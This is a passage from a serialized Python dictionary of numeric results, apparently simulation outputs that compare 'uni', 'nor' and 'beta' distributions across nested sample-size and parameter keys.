'beta2': 0.14157458374551313, 'beta4': 0.049547505930433555}, 750: {'uni': 0.0709251826905879, 'nor': 0.11006834833669127, 'beta1': 0.07067419085948462, 'beta2': 0.14514453194775367, 'beta4': 0.058480081465393324}, 500: {'uni': 0.08637817894053323, 'nor': 0.12102770685673514, 'beta1': 0.08706590398005343, 'beta2': 0.15434162169167048, 'beta4': 0.07347251631345947}, 400: {'uni': 0.09753878203585215, 'nor': 0.12985513065211424, 'beta1': 0.0972356544421249, 'beta2': 0.1640862893662115, 'beta4': 0.08247651502832595}, 300: {'uni': 0.11086452484782922, 'nor': 0.13822319327826305, 'beta1': 0.11173259516719364, 'beta2': 0.1769745582721851, 'beta4': 0.09992542940472177}, 200: {'uni': 0.1399113243441577, 'nor': 0.15754885236536986, 'beta1': 0.136504750476084, 'beta2': 0.1941827278811873, 'beta4': 0.12077586465850387}, 150: {'uni': 0.1590697336850151, 'nor': 0.17753710966522074, 'beta1': 0.1580347543820162, 'beta2': 0.20987840790701257, 'beta4': 0.14471527608486495}, 100: {'uni': 0.1871751727081637, 'nor': 0.21427301060804643, 'beta1': 0.1929312353732119, 'beta2': 0.23670383329819866, 'beta4': 0.18070834369207195}, 75: {'uni': 0.21739174405685768, 'nor': 0.23735012999276262, 'beta1': 0.22576097503322584, 'beta2': 0.25410438149243303, 'beta4': 0.2141905644666299}, 50: {'uni': 0.2702693450523803, 'nor': 0.287556930723528, 'beta1': 0.26606292030801165, 'beta2': 0.3120374891941139, 'beta4': 0.2628605451724907}, 30: {'uni': 0.3633925191505936, 'nor': 0.3553499682791369, 'beta1': 0.3472416410315157, 'beta2': 0.36603539622620074, 'beta4': 0.3402149887634394}, 20: {'uni': 0.43686780250760227, 'nor': 0.43357372518649273, 'beta1': 0.4365167361387447, 'beta2': 0.4400213044310824, 'beta4': 0.4227051807564033}, 10: {'uni': 0.582850916214453, 'nor': 0.5881615041484773, 'beta1': 0.5909724443518736, 'beta2': 0.5979959647698587, 'beta4': 0.5748894185128298}}, 200: {1000: {'uni': 0.06189276066343463, 'nor': 0.11833873344342205, 'beta1': 0.061831743193413335, 'beta2': 0.15906399693195816, 'beta4': 0.048460784542351754}, 750: {'uni': 0.07134707707247834, 'nor': 0.12617513205267883, 'beta1': 0.07100572922533299, 'beta2': 0.1607658467629688, 'beta4': 0.05614867367172871}, 500: {'uni': 0.08564106049840525, 'nor': 0.13304497843595064, 'beta1': 0.0874138510347292, 'beta2': 0.17131354724595504, 'beta4': 0.07175587677838369}, 400: {'uni': 0.09267272777082991, 'nor': 0.14309653474101058, 'beta1': 0.09813249384450734, 'beta2': 0.17913524248375756, 'beta4': 0.08268049428370317}, 300: {'uni': 0.10923381308894958, 'nor': 0.15222716073399284, 'beta1': 0.11266368232034613, 'beta2': 0.1854635291641431, 'beta4': 0.09615779121211337}, 200: {'uni': 0.1363804725778009, 'nor': 0.17267694139649953, 'beta1': 0.13582009258399352, 'beta2': 0.19574314248677793, 'beta4': 0.1179637069833459}, 150: {'uni': 0.15887161022374907, 'nor': 0.18432817945104918, 'beta1': 0.16199472287112165, 'beta2': 0.21773658228591058, 'beta4': 0.14255486238615406}, 100: {'uni': 0.19262944923823816, 'nor': 0.21456176331780907, 'beta1': 0.19248127836354945, 'beta2': 0.249444130339123, 'beta4': 0.17499830511234898}, 75: {'uni': 0.22633597240156172, 'nor': 0.24116115592351106, 'beta1': 0.2161337337848539, 'beta2': 0.2609793421406472, 'beta4': 0.21072808513003066}, 50: {'uni': 0.2644800919231039, 'nor': 0.297735358593486, 'beta1': 0.27231937439921694, 'beta2': 0.3102197722435756, 'beta4': 0.25709639846200694}, 30: {'uni': 0.34625180846494763, 'nor': 0.35746737858146227, 'beta1': 0.354486005184482, 'beta2': 0.38683476647160936, 'beta4': 0.33170959441086517}, 20: {'uni': 0.4208903869972874, 'nor': 0.43552557162203065, 'beta1': 0.4221261305003158, 'beta2': 0.43662638995711245, 'beta4': 0.41463291398406665}, 10: {'uni': 0.5741138916139755, 'nor': 0.5851120398678165, 'beta1': 0.5841496889181017, 'beta2': 0.5934894074324251, 'beta4': 0.5863482781018794}}, 150: {1000: {'uni': 0.061581541028080056, 'nor': 0.13381363846898142, 'beta1': 0.06128042761918895, 'beta2': 0.1708966560232832, 'beta4': 0.04741420430861787}, 750: {'uni': 0.07217513645135509, 'nor': 0.1419413060812098, 'beta1': 0.07273928089814014, 'beta2': 0.1704412808052873, 'beta4': 0.05574805904383956}, 500: {'uni': 0.08676298708174202, 'nor': 0.14572604267188155, 'beta1': 0.08647759105067054, 'beta2': 0.18242632197904074, 'beta4': 0.068983137151813}, 400: {'uni': 0.1037742765004267, 'nor': 0.15223240381779424, 'beta1': 0.09518076159694533, 'beta2': 0.18643202068616882, 'beta4': 0.07923549680449954}, 300: {'uni': 0.11129074028405522, 'nor': 0.16268462117490684, 'beta1': 0.11075585275192301, 'beta2': 0.19821370441263542, 'beta4': 0.0912523876738719}, 200: {'uni': 0.14156920331099243, 'nor': 0.183250873096864, 'beta1': 0.13716604234880148, 'beta2': 0.2130216482290011, 'beta4': 0.11611656331446252}, 150: {'uni': 0.15991456155699446, 'nor': 0.19972632801083756, 'beta1': 0.1591623711263259, 'beta2': 0.22363803209488897, 'beta4': 0.14252665232189032}, 100: {'uni': 0.19390376852650276, 'nor': 0.2201533899028501, 'beta1': 0.18839789593786516, 'beta2': 0.24896472297863287, 'beta4': 0.1770303243572896}, 75: {'uni': 0.22864723992828329, 'nor': 0.25517195260709286, 'beta1': 0.2223328847363084, 'beta2': 0.2733216821263156, 'beta4': 0.20304334588696407}, 50: {'uni': 0.27905130659334465, 'nor': 0.29278280274240853, 'beta1': 0.27019362750168496, 'beta2': 0.31309475544534465, 'beta4': 0.2559990955320065}, 30: {'uni': 0.3425789585849717, 'nor': 0.37265663059965937, 'beta1': 0.3464581721664352, 'beta2': 0.3754015070826656, 'beta4': 0.33959173277428956}, 20: {'uni': 0.413086515337455, 'nor': 0.43965945028509446, 'beta1': 0.418736079933717, 'beta2': 0.4501591234804877, 'beta4': 0.4084124782048353}, 10: {'uni': 0.5706418060679364, 'nor': 0.6001645167142622, 'beta1': 0.583725351797004, 'beta2': 0.6040594457979085, 'beta4': 0.5764634218983131}}, 100: {1000: {'uni': 0.06313216417743228, 'nor': 0.15511920982718863, 'beta1': 0.06071848963460641, 'beta2': 0.1852927465697436, 'beta4': 0.046839153362001285}, 750: {'uni': 0.07060453599906669, 'nor': 0.15967621914568836, 'beta1': 0.07229601201250235, 'beta2': 0.182858927441081, 'beta4': 0.055455267837987376}, 500: {'uni': 0.08818052394211406, 'nor': 0.16873532933540125, 'beta1': 0.0868958489599253, 'beta2': 0.1975968138053138, 'beta4': 0.06905730331083232}, 400: {'uni': 0.09814516465678552, 'nor': 0.1712550619838623, 'beta1': 0.09386098643015672, 'beta2': 0.20350183151319534, 'beta4': 0.0760007184942118}, 300: {'uni': 0.11258064110576615, 'nor': 0.1861127284054659, 'beta1': 0.11092868379936521, 'beta2': 0.20785761241672152, 'beta4': 0.09103330358097073}, 200: {'uni': 0.1420062149021436, 'nor': 0.2039189542914086, 'beta1': 0.13490696398941743, 'beta2': 0.21950847474619883, 'beta4': 0.11479778662604484}, 150: {'uni': 0.15523966003490114, 'nor': 0.21793931900467456, 'beta1': 0.15561530770905507, 'beta2': 0.2357875854144415, 'beta4': 0.13546635253677153}, 100: {'uni': 0.19239990647813998, 'nor': 0.2438993981647118, 'beta1': 0.1922366330056719, 'beta2': 0.2604761303669994, 'beta4': 0.1659451762115397}, 75: {'uni': 0.22461916118542863, 'nor': 0.27058774539802555, 'beta1': 0.22230160922578357, 'beta2': 0.2911017312827485, 'beta4': 0.19346309234954379}, 50: {'uni': 0.27074554119725264, 'nor': 0.30742771165485183, 'beta1': 0.27244230243937856, 'beta2': 0.32070239362920566, 'beta4': 0.24948280857988892}, 30: {'uni': 0.35244357964247014, 'nor': 0.36981016362792096, 'beta1': 0.34898633566867193, 'beta2': 0.38698154490065484, 'beta4': 0.3248812590836839}, 20: {'uni': 0.4240679624088838, 'nor': 0.45938820409137887, 'beta1': 0.43245353617429105, 'beta2': 0.44501946591388836, 'beta4': 0.40725305375468834}, 10: {'uni': 0.5815683982350479, 'nor': 0.5902866349338, 'beta1': 0.5747202522025672, 'beta2': 0.6059676751094598, 'beta4': 0.5690438100022845}}, 75: {1000: {'uni': 0.06343097776077222, 'nor': 0.18225818491306756, 'beta1': 0.06089929840604752, 'beta2': 0.1921539386252139, 'beta4': 0.04668630013644415}, 750: {'uni': 0.07093914009247082, 'nor': 0.18331684154766742, 'beta1': 0.07107432732560648, 'beta2': 0.19880651185771303, 'beta4': 0.05348844967825772}, 500: {'uni': 0.08795472881903066, 'nor': 0.18823200655948724, 'beta1': 0.08586213142784449, 'beta2': 0.20523208991902597, 'beta4': 0.0679290798965112}, 400: {'uni': 0.09712081890314317, 'nor': 0.19232649259506907, 'beta1': 0.09572130547403512, 'beta2': 0.20602199644821684, 'beta4': 0.07606892412187635}, 300: {'uni': 0.11089260364623976, 'nor': 0.20098062324678168, 'beta1': 0.11308804326671185, 'beta2': 0.21785952031115308, 'beta4': 0.08679599809855915}, 200: {'uni': 0.13809595295884958, 'nor': 0.21558504424344116, 'beta1': 0.13648211163259177, 'beta2': 0.2240794200909899, 'beta4': 0.11204654007283227}, 150: {'uni': 0.15618647125937568, 'nor': 0.22837035534828887, 'beta1': 0.16415374893470858, 'beta2': 0.24619708299092824, 'beta4': 0.1306985642616213}, 100: {'uni': 0.19101450956719734, 'nor': 0.25931455723118757, 'beta1': 0.1906189266503715, 'beta2': 0.25867729487710983, 'beta4': 0.16519992510196357}, 75: {'uni': 0.2248743837036717, 'nor': 0.284057154634835, 'beta1': 0.2214601276761196, 'beta2': 0.2968579661443965, 'beta4': 0.19826666120956982}, 50: {'uni': 0.2662431911648192, 'nor': 0.322043709935765, 'beta1': 0.2744451907446851, 'beta2': 0.32350434821909946, 'beta4': 0.23404149031621968}, 30: {'uni': 0.3413757219051654, 'nor': 0.38244337953851876, 'beta1': 0.33835049788177923, 'beta2': 0.38719686508504525, 'beta4': 0.32727681475974785}, 20: {'uni': 0.4194033788361589, 'nor': 0.4577741598526479, 'beta1': 0.42074777341644765, 'beta2': 0.459091804977372, 'beta4': 0.396462204973229}, 10: {'uni': 0.5907006598340476, 'nor': 0.6052762697560137, 'beta1': 0.5799457230505303, 'beta2': 0.5967731695513359, 'beta4': 0.5567664226243562}}, 50: {1000: {'uni': 0.06289662081877767, 'nor': 0.21209732127933695, 'beta1': 0.06328219460040524, 'beta2': 0.21952990496616331, 'beta4': 0.04652359653778593}, 750: {'uni': 0.07302743229171516, 'nor': 0.214754896945754, 'beta1': 0.07193093639114312, 'beta2': 0.22024404018125943, 'beta4': 0.05415327509547532}, 500: {'uni': 0.08893676490117702, 'nor': 0.22572655912609974, 'beta1': 0.08580989277541334, 'beta2': 0.22230227225554544, 'beta4': 0.06673468929448162}, 400: {'uni': 0.09924243273175976, 'nor': 0.21704650146565524, 'beta1': 0.09913193004467818, 'beta2': 0.2230390821061281, 'beta4': 0.07605580382200511}, 300: {'uni': 0.11166832041438324, 'nor': 0.2316018695710197, 'beta1': 0.11095163241473041, 'beta2': 0.22865927465012947, 'beta4': 0.08685797923558519}, 200: {'uni': 0.13771685172695608, 'nor': 0.2444927799351998, 'beta1': 0.13618389281423876, 'beta2': 0.2476456752305473, 'beta4': 0.11083026707940419}, 150: {'uni': 0.16377774164329523, 'nor': 0.26636154033277937, 'beta1': 0.15952097465539494, 'beta2': 0.2642089480719845, 'beta4': 0.12746484906871963}, 100: {'uni': 0.19907093430084438, 'nor': 0.2881344316533607, 'beta1': 0.19083482136604094, 'beta2': 0.2795457182953769, 'beta4': 0.16290169574365254}, 75: {'uni': 0.22574036421615706, 'nor': 0.2945057282847927, 'beta1': 0.22099290833697738, 'beta2': 0.3125623487295235, 'beta4': 0.18773801878190854}, 50: {'uni': 0.26854352815958205, 'nor': 0.34022111278024636, 'beta1': 0.26708927188428466, 'beta2': 0.33081642137592326, 'beta4': 0.2312879966418534}, 30: {'uni': 0.34609583514062453, 'nor': 0.3974340756558435, 'beta1': 0.35262530240286505, 'beta2': 0.40184913128104555, 'beta4': 0.31424089478942174}, 20: {'uni': 0.42087262066086245, 'nor': 0.4723782826353492, 'beta1': 0.40877860835331126, 'beta2': 0.4688509117448108, 'beta4': 0.3944964916008954}, 10: {'uni': 0.5876869576804664, 'nor': 0.6147903811081372, 'beta1': 0.5755066117906042, 'beta2': 0.6002859122286868, 'beta4': 0.5619966062890571}}, 30: {1000: {'uni': 0.06948652094585245, 'nor': 0.2718705530055696, 'beta1': 0.06121483805914607, 'beta2': 0.24043460865095967, 'beta4': 0.04627664402531112}, 750: {'uni': 0.07850498128590577, 'nor': 0.2757982454491844, 'beta1': 0.07241579137645177, 'beta2': 0.23983322004672003, 'beta4': 0.05332068388106076}, 500: {'uni': 0.09105158068430297, 'nor': 0.28241113398116124, 'beta1': 0.08799353765963347, 'beta2': 0.24766224893806577, 'beta4': 0.06765893263671346}, 400: {'uni': 0.10259273534636915, 'nor': 0.2792924843341777, 'beta1': 0.09836004244107166, 'beta2': 0.2550995041680404, 'beta4': 0.07407712496960317}, 300: {'uni': 0.11391452466229124, 'nor': 0.2807189754417535, 'beta1': 0.10984101411545055, 'beta2': 0.26044799268369856, 'beta4': 0.08443610887402886}, 200: {'uni': 0.14196809341696937, 'nor': 0.30755809164972786, 'beta1': 0.134610786707702, 'beta2': 0.2728609545630691, 'beta4': 0.10722586308476961}, 150: {'uni': 0.16419172956318423, 'nor': 0.3146162122023685, 'beta1': 0.16286335903122795, 'beta2': 0.2776012731538803, 'beta4': 0.12523292823182686}, 100: {'uni': 0.1960001100263563, 'nor': 0.33279373396299217, 'beta1': 0.19130478182156138, 'beta2': 0.3054148396914321, 'beta4': 0.14912466816038042}, 75: {'uni': 0.2185677970786405, 'nor': 0.34709466522087906, 'beta1': 0.22127741653506036, 'beta2': 0.3201758535953785, 'beta4': 0.1777525903209297}, 50: {'uni': 0.270413471015134, 'nor': 0.3892831769925561, 'beta1': 0.2761867140439328, 'beta2': 0.35340657017600746, 'beta4': 0.22674679543504245}, 30: {'uni': 0.3355166504892189, 'nor': 0.44161834679911804, 'beta1': 0.3401068225433252, 'beta2': 0.4102852253271071, 'beta4': 0.3009578630318522}, 20: {'uni': 0.4262038800117972, 'nor': 0.5086511058873824, 'beta1': 0.41934711626787075, 'beta2': 0.4781819621838607, 'beta4': 0.3804323693448428}, 10: {'uni': 0.5575440699348245, 'nor': 0.6393871170053329, 'beta1': 0.5743956360209639, 'beta2': 0.6106643197230515, 'beta4': 0.55155845441342}}, 20: {1000: {'uni': 0.07536262505840652, 'nor': 0.325103001431867, 'beta1': 0.06343013362012273, 'beta2': 0.2629182940928082, 'beta4': 0.0460977432301721}, 750: {'uni': 0.0829470027542002, 'nor': 0.32291554964370983, 'beta1': 0.07116730251499337, 'beta2': 0.2659412807353341, 'beta4': 0.05406687577763064}, 500: {'uni': 0.09694368519188473, 'nor': 0.3349376153106337, 'beta1': 0.08654293972580873, 'beta2': 0.2723939674154165, 'beta4': 0.06538298069380022}, 400: {'uni': 0.10627426651824678, 'nor': 0.3429154491873649, 'beta1': 0.09562315388400733, 'beta2': 0.274633662575442, 'beta4': 0.07380231095120421}, 300: {'uni': 0.12121567109701081, 'nor': 0.34972582827606147, 'beta1': 0.1103611782866849, 'beta2': 0.2862428547095127, 'beta4': 0.08272204817151216}, 200: {'uni': 0.14071639130023078, 'nor': 0.35855620239382735, 'beta1': 0.13776555190056528, 'beta2': 0.29720835544613766, 'beta4': 0.10338502388302273}, 150: {'uni': 0.1674293069624112, 'nor': 0.3688691322877407, 'beta1': 0.1527138911941961, 'beta2': 0.3059024770592428, 'beta4': 0.11972445069338061}, 100: {'uni': 0.1931249598575589, 'nor': 0.3948780972148766, 'beta1': 0.19347436784743782, 'beta2': 0.3310703246707575, 'beta4': 0.15095159670353941}, 75: {'uni': 0.22271809589488334, 'nor': 0.3953558256807349, 'beta1': 0.22024905763478564, 'beta2': 0.34639607563218006, 'beta4': 0.1733242565090895}, 50: {'uni': 0.2692139861904778, 'nor': 0.44176675584445435, 'beta1': 0.2681610154192196, 'beta2': 0.3688995176021794, 'beta4': 0.2199893429283878}, 30: {'uni': 0.34613135894553704, 'nor': 0.48601158747952417, 'beta1': 0.3526353889844575, 'beta2': 0.41994055226884575, 'beta4': 0.3022745779371493}, 20: {'uni': 0.4142621100975231, 'nor': 0.5324753066803931, 'beta1': 0.42017567922341303, 'beta2': 0.4983438571041758, 'beta4': 0.37087287301736277}, 10: {'uni': 0.5815509625778061, 'nor': 0.6599263857098001, 'beta1': 0.5848662195260658, 'beta2': 0.6277074211809401, 'beta4': 0.536410316354095}}, 10: {1000: {'uni': 0.10593932477847545, 'nor': 0.47843393031925197, 'beta1': 0.09118434879484168, 'beta2': 0.31039960784712656, 'beta4': 0.04571662748262856}, 750: {'uni': 0.10873654868800559, 'nor': 0.4828796783832185, 'beta1': 0.09123008540154381, 'beta2': 0.32058869843201154, 'beta4': 0.05459270006386302}, 500: {'uni': 0.1218524317529881, 'nor': 0.47457693822012165, 'beta1': 0.09190111833494254, 'beta2': 0.32548160013208494, 'beta4': 0.06444599187085187}, 400: {'uni': 0.1291175399330874, 'nor': 0.48422996573767696, 'beta1': 0.09770420769932464, 'beta2': 0.3207957215249058, 'beta4': 0.07182128251456826}, 300: {'uni': 0.13986394783048994, 'nor': 0.4936681503491342, 'beta1': 0.11639095276280087, 'beta2': 0.3302723438968203, 'beta4': 0.08350546988796351}, 200: {'uni': 0.15641204249228619, 'nor': 0.49091789466629215, 'beta1': 0.1384070227155504, 'beta2': 0.33428367370964873, 'beta4': 0.10341259876194087}, 150: {'uni': 0.1795234939504045, 'nor': 0.5105288108171256, 'beta1': 0.15598497704645214, 'beta2': 0.3493488175884878, 'beta4': 0.121233871216612}, 100: {'uni': 0.20239443979403965, 'nor': 0.5084179657882892, 'beta1': 0.19184385711254798, 'beta2': 0.3677119127424313, 'beta4': 0.14277278677201605}, 75: {'uni': 0.23336879708678648, 'nor': 0.5372531064368602, 'beta1': 0.21661827263964478, 'beta2': 0.38626444266491533, 'beta4': 0.1731449508683547}, 50: {'uni': 0.27958310612315557, 'nor': 0.5493723312942567, 'beta1': 0.27176323053080753, 'beta2': 0.4024758607629697, 'beta4': 0.21208860379265493}, 30: {'uni': 0.35159835409526013, 'nor': 0.6014446437219039, 'beta1': 0.3425500943598077, 'beta2': 0.4384712270988477, 'beta4': 0.27735321868152857}, 20: {'uni': 0.42536479079788436, 'nor': 0.638297428768129, 'beta1': 0.41601242728257026, 'beta2': 0.4962070327728678, 'beta4': 0.35012615099378874}, 10: {'uni': 0.5790001552629874, 'nor': 0.7766658813569549, 'beta1': 0.5698438923280504, 'beta2': 0.6494949780401632, 'beta4': 0.5099159037878125}}}, 0.005: {1000: {1000: {'uni': 0.054309210293536636, 'nor': 0.06770710838466354, 'beta1': 0.05394964156179005, 'beta2': 0.10851637362805477, 'beta4': 0.04843440132315624}, 750: {'uni': 0.06322911372839468, 'nor': 0.0745551173670449, 'beta1': 0.06287867060893981, 'beta2': 0.11461799139150997, 'beta4': 0.05586943360634522}, 500: {'uni': 0.07765031214887835, 'nor': 0.08611027590190884, 'beta1': 0.07713692782616743, 'beta2': 0.11964611258405178, 'beta4': 0.07119677640670702}, 400: {'uni': 0.0854335124620158, 'nor': 0.09548666720165888, 'beta1': 0.08533596488740514, 'beta2': 0.12715285235100549, 'beta4': 0.07976243865103633}, 300: {'uni': 0.09989789753529099, 'nor': 0.10770019723728286, 'beta1': 0.10033186368236657, 'beta2': 0.13419229911795216, 'beta4': 0.09411115678315363}, 200: {'uni': 0.12127892617742153, 'nor': 0.12720442210497968, 'beta1': 0.12233003012147065, 'beta2': 0.15172099760163998, 'beta4': 0.11632447574237281}, 150: {'uni': 0.14013211406544834, 'nor': 0.14827174402121335, 'beta1': 0.13915131007977077, 'beta2': 0.1658270971393584, 'beta4': 0.13647642747887956}, 100: {'uni': 0.16997690980859004, 'nor': 0.17670091885771855, 'beta1': 0.16973161594489053, 'beta2': 0.19345282120387458, 'beta4': 0.1661007523523409}, 75: {'uni': 0.19932581091265966, 'nor': 0.2027740177880774, 'beta1': 0.19612208261591985, 'beta2': 0.21702643923996, 'beta4': 0.19530006216709206}, 50: {'uni': 0.2468910799274996, 'nor': 0.24339758057452598, 'beta1': 0.24033137076480987, 'beta2': 0.252320775622887, 'beta4': 0.2366355896057103}, 30: {'uni': 0.305496981057798, 'nor': 0.3093061642043575, 'beta1': 0.3019112459095068, 'beta2': 0.32031294166562413, 'beta4': 0.3061483505104996}, 20: {'uni': 0.3717287585662501, 'nor': 0.37675350444050804, 'beta1': 0.37247628349892237, 'beta2': 0.37673982805892064, 'beta4': 0.3751343167170222}, 10: {'uni': 0.521167289093317, 'nor': 0.518263035063083, 'beta1': 0.5175638164552467, 'beta2': 0.5206573949182801, 'beta4': 0.5201760853486797}}, 750: {1000: {'uni': 0.055164667777315046, 'nor': 0.07131664732480447, 'beta1': 0.05461015638241973, 'beta2': 0.10747658269785487, 'beta4': 0.04694525214323675}, 750: {'uni': 0.06303342152086694, 'nor': 0.07763029700247803, 'beta1': 0.06322330711203825, 'beta2': 0.11262414947388338, 'beta4': 0.05532984777518732}, 500: {'uni': 0.07669845695030969, 'nor': 0.09063047612797143, 'beta1': 0.07696921230024523, 'beta2': 0.11983272103386594, 'beta4': 0.06956147386680006}, 400: {'uni': 0.08611488267094475, 'nor': 0.0974713367565152, 'beta1': 0.08478041441928014, 'beta2': 0.12731656056450652, 'beta4': 0.07991489810774749}, 300: {'uni': 0.09985154726648465, 'nor': 0.111169848481041, 'beta1': 0.09777711208026346, 'beta2': 0.13531396869038226, 'beta4': 0.09119975402687397}, 200: {'uni': 0.1211085307144601, 'nor': 0.12968999402436032, 'beta1': 0.12091197897231892, 'beta2': 0.15150314994539527, 'beta4': 0.1155329295397578}, 150: {'uni': 0.14070726556031377, 'nor': 0.14567076992622047, 'beta1': 0.13814881873714974, 'beta2': 0.16827021141072973, 'beta4': 0.13447433397080932}, 100: {'uni': 0.17147077335738992, 'nor': 0.17723697577268377, 'beta1': 0.1701072384695923, 'beta2': 0.19228744913609386, 'beta4': 0.16650131522038414}, 75: {'uni': 0.19697585503036097, 'nor': 0.2068795811630726, 'beta1': 0.19570918631380896, 'beta2': 0.21738847323087096, 'beta4': 0.19446732054460464}, 50: {'uni': 0.23830528070048534, 'nor': 0.24112746544721542, 'beta1': 0.24024370353633562, 'beta2': 0.25617890898562745, 'beta4': 0.2374860040189496}, 30: {'uni': 0.3047940690571652, 'nor': 0.3117736625777223, 'beta1': 0.3075351731550439, 'beta2': 0.3272819694873685, 'beta4': 0.3075370456855608}, 20: {'uni': 0.38162187029118155, 'nor': 0.3738685108858104, 'beta1': 0.372463189312913, 'beta2': 0.3868272294258014, 'beta4': 0.37379486160733993}, 10: {'uni': 0.5258444160016277, 'nor': 0.5215991214259363, 'beta1': 0.517833660238219, 'beta2': 0.5255924381659314, 'beta4': 0.514420238437874}}, 500: {1000: {'uni': 0.05462849470497394, 'nor': 0.07814858053006213, 'beta1': 0.05439078035500816, 'beta2': 0.11786529274785795, 'beta4': 0.04512974256857838}, 750: {'uni': 0.0630164202653, 'nor': 0.08598140708093582, 'beta1': 0.06280717820250309, 'beta2': 0.12253896527927555, 'beta4': 0.05327711159917553}, 500: {'uni': 0.07718768079866062, 'nor': 0.09473087596860513, 'beta1': 0.07771672820740799, 'beta2': 0.13066189974731812, 'beta4': 0.06792781655042113}, 400: {'uni': 0.08727900239437064, 'nor': 0.1031046602693152, 'beta1': 0.08587201246728926, 'beta2': 0.13750278345580969, 'beta4': 0.07641943558033681}, 300: {'uni': 0.09735499483435273, 'nor': 0.11238965365776238, 'beta1': 0.10105981918034712, 'beta2': 0.1429736395904797, 'beta4': 0.09020195977248413}, 200: {'uni': 0.12317763693332873, 'nor': 0.13530119957403747, 'beta1': 0.11942019256586084, 'beta2': 0.16298780836084303, 'beta4': 0.11456409066249257}, 150: {'uni': 0.1407614431099966, 'nor': 0.15131961478693112, 'beta1': 0.14148625143732174, 'beta2': 0.17679433711198078, 'beta4': 0.13076961122199615}, 100: {'uni': 0.1713862765989115, 'nor': 0.18173933803266007, 'beta1': 0.17107023194956172, 'beta2': 0.20004435790715813, 'beta4': 0.16667447549743752}, 75: {'uni': 0.19683034656665033, 'nor': 0.20562378844499862, 'beta1': 0.20171095440300613, 'beta2': 0.2228278954167986, 'beta4': 0.18979851902028033}, 50: {'uni': 0.24134168665013422, 'nor': 0.25303094047370045, 'beta1': 0.2405937821161408, 'beta2': 0.25814476480505677, 'beta4': 0.23379201812238004}, 30: {'uni': 0.30572219759341496, 'nor': 0.3138147539731113, 'beta1': 0.31220387612792333, 'beta2': 0.32746285385932816, 'beta4': 0.3068274256947208}, 20: {'uni': 0.3766240108372487, 'nor': 0.3794127882935937, 'beta1': 0.3687031808183018, 'beta2': 0.3835817175154338, 'beta4': 0.36538004912059097}, 10: {'uni': 0.5172842691254594, 'nor': 0.5231665455873322, 'beta1': 0.5189693525633482, 'beta2': 0.5311363287437341, 'beta4': 0.5139644087094528}}, 400: {1000: {'uni': 0.05437173202096113, 'nor': 0.08305972110203474, 'beta1': 0.054735721524527214, 'beta2': 0.11691664940089053, 'beta4': 0.044764759336513305}, 750: {'uni': 0.06296519099843445, 'nor': 0.08805615903403163, 'beta1': 0.06272026286720017, 'beta2': 0.1210806824585442, 'beta4': 0.052896515060130544}, 500: {'uni': 0.07760492127335133, 'nor': 0.0995661105004016, 'beta1': 0.07684496802411883, 'beta2': 0.12802441585532842, 'beta4': 0.06722957912133365}, 400: {'uni': 0.08525797685642766, 'nor': 0.1059372885433747, 'beta1': 0.08619988724777161, 'beta2': 0.13431886591110576, 'beta4': 0.07539217174214996}, 300: {'uni': 0.0982990668151138, 'nor': 0.11634268888448995, 'beta1': 0.09983116086197136, 'beta2': 0.14490484107113055, 'beta4': 0.08792653305842368}, 200: {'uni': 0.12203769639477358, 'nor': 0.13660314035918714, 'beta1': 0.12012838172596668, 'beta2': 0.15855457816365026, 'beta4': 0.11342497995414347}, 150: {'uni': 0.13994483228161086, 'nor': 0.15423137169373957, 'beta1': 0.14071121957348942, 'beta2': 0.1759524837742879, 'beta4': 0.12973842437014774}, 100: {'uni': 0.16998004751235896, 'nor': 0.18533997087586795, 'beta1': 0.17260069554339919, 'beta2': 0.20142524926231042, 'beta4': 0.16375622461186412}, 75: {'uni': 0.19919438048820443, 'nor': 0.20872180909907717, 'beta1': 0.19747443091888628, 'beta2': 0.22331606995046627, 'beta4': 0.18915187538619394}, 50: {'uni': 0.24260494503890717, 'nor': 0.2490837050424674, 'beta1': 0.24174431425141207, 'beta2': 0.26695113075708743, 'beta4': 0.23530080467269482}, 30: {'uni': 0.30678574020464666, 'nor': 0.3207642333511338, 'beta1': 0.30811715717135785, 'beta2': 0.3248044091864074, 'beta4': 0.3019272505018041}, 20: {'uni': 0.3754849973727803, 'nor': 0.3792312499409558, 'beta1': 0.3737894450702678, 'beta2': 0.39127103265108387, 'beta4': 0.3711738822600462}, 10: {'uni': 0.5138997823796634, 'nor': 0.5127905077842452, 'beta1': 0.5169043634953481, 'beta2': 0.5281055333295728, 'beta4': 0.5193863606893283}}, 300: {1000: {'uni': 0.054171219309968266, 'nor': 0.09149857715201964, 'beta1': 0.054967619265905765, 'beta2': 0.12328907814221546, 'beta4': 0.04422880083376829}, 750: {'uni': 0.06228069924407087, 'nor': 0.09672249810959854, 'beta1': 0.0633028218826393, 'beta2': 0.12865131475687186, 'beta4': 0.05215982023008059}, 500: {'uni': 0.07862740955308545, 'nor': 0.10538600209851101, 'beta1': 0.07634673776224471, 'beta2': 0.13579516304274086, 'beta4': 0.06570451083138404}, 400: {'uni': 0.08606522700190578, 'nor': 0.11159352035626091, 'beta1': 0.08637179271313189, 'beta2': 0.1427193158728336, 'beta4': 0.07325637093886234}, 300: {'uni': 0.09982270055761183, 'nor': 0.122758213601175, 'beta1': 0.09973780782522945, 'beta2': 0.15198003666478777, 'beta4': 0.08630423340788074}, 200: {'uni': 0.12190239561659899, 'nor': 0.14363241010985406, 'beta1': 0.1212028739293255, 'beta2': 0.16502734817092168, 'beta4': 0.10950972011591287}, 150: {'uni': 0.1417718900803699, 'nor': 0.1593838233572799, 'beta1': 0.14050415423056511, 'beta2': 0.17994840692557712, 'beta4': 0.12734797519473529}, 100: {'uni': 0.17071272759843154, 'nor': 0.18620924221751517, 'beta1': 0.1694943482147639, 'beta2': 0.2061617674979867, 'beta4': 0.15839016146732976}, 75: {'uni': 0.19584271511298973, 'nor': 0.2093370290072297, 'beta1': 0.19718572391483902, 'beta2': 0.23127370158834348, 'beta4': 0.18832549889256817}, 50: {'uni': 0.2373732051332261, 'nor': 0.2525943440552235, 'beta1': 0.24061212793870418, 'beta2': 0.26576036413576276, 'beta4': 0.23083689372432803}, 30: {'uni': 0.3100041602252892, 'nor': 0.3259233331503591, 'beta1': 0.3043992784905107, 'beta2': 0.32847104261195337, 'beta4': 0.2976093515050148}, 20: {'uni': 0.37875813326972396, 'nor': 0.38421934320745366, 'beta1': 0.36904579022730116, 'beta2': 0.39257091754456774, 'beta4': 0.3714918858680628}, 10: {'uni': 0.5256130005835765, 'nor': 0.5146313247332729, 'beta1': 0.5154354512884594, 'beta2': 0.5236551729483561, 'beta4': 0.5171483868755382}}, 200: {1000: {'uni': 0.054823062468771444, 'nor': 0.10237608718650248, 'beta1': 0.054913425269282445, 'beta2': 0.13753066984524742, 'beta4': 0.04306065777641055}, 750: 